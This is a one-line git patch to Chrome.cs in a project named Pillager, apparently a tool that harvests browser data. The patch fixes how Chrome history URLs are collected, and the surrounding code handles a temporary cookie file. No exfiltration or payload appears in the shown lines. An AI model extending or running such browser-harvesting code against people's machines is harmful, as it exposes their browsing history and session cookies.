From 2376b54c2b25431b68a8305b7a2e92c3d7d63753 Mon Sep 17 00:00:00 2001 From: qwqdanchun <287182701@qq.com> Date: Sat, 29 Apr 2023 21:13:29 +0800 Subject: [PATCH] Update Chrome.cs --- Pillager/Browsers/Chrome.cs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Pillager/Browsers/Chrome.cs b/Pillager/Browsers/Chrome.cs index 6d381c8..e1006f7 100644 --- a/Pillager/Browsers/Chrome.cs +++ b/Pillager/Browsers/Chrome.cs @@ -140,7 +140,7 @@ namespace Pillager.Browsers for (int i = 0; i < handler.GetRowCount(); i++) { string url = handler.GetValue(i, "url"); - history.AppendLine("url"); + history.AppendLine(url); } File.Delete(cookie_tempFile); }